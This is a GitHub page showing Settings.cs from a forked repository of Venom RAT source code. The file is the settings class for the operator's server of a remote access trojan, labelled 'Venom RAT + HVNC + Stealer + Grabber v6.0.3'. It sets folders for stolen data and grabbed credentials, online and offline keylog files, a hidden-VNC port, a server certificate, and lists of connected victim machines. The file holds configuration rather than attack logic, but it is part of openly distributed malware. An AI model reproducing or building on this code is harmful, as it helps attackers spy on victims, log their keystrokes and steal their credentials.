forked from BabelQwerty/VenomRat-SourceCode
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Settings.cs
75 lines (48 loc) · 1.89 KB
/
Settings.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
using System.Collections.Generic;
using System.Linq;
using System.Security.Cryptography.X509Certificates;
using System.Windows.Forms;
using Server.Connection;
namespace Server;
public static class Settings
{
public static GROUP_TYPE groupby = GROUP_TYPE.NONE;
public const string DATA_DIR = "ClientsFolder";
public const string RECOVERY_DIR = "Recovery";
public const string GRAB_DIR = "VenomStealer";
public const string NOTE_FILE = "note.json";
public const string OnlineKeyLogFile = "online_keylog.log";
public const string OfflineKeyLogFile = "offline_keylog.log";
public const string InstalledAppsFile = "installed.json";
public static List<string> Blocked = new List<string>();
public static object LockBlocked = new object();
public static object LockReceivedSendValue = new object();
public static string CertificatePath = Application.StartupPath + "\\VenomServer.p12";
public static X509Certificate2 VenomServer;
public static readonly string Version = "Venom RAT + HVNC + Stealer + Grabber v6.0.3";
public static object LockListviewClients = new object();
public static object LockListviewLogs = new object();
public static object LockListviewThumb = new object();
public static bool ReportWindow = false;
public static List<Clients> ReportWindowClients = new List<Clients>();
public static object LockReportWindowClients = new object();
public static int HvncPort = 4448;
public static object lockclients = new object();
public static List<Clients> connectedClients = new List<Clients>();
public static long SentValue { get; set; }
public static long ReceivedValue { get; set; }
public static List<ClientInfo> connectedClientInfo
{
get
{
try
{
return connectedClients.Select((Clients cl) => cl.info).ToList();
}
catch
{
}
return new List<ClientInfo>();
}
}
}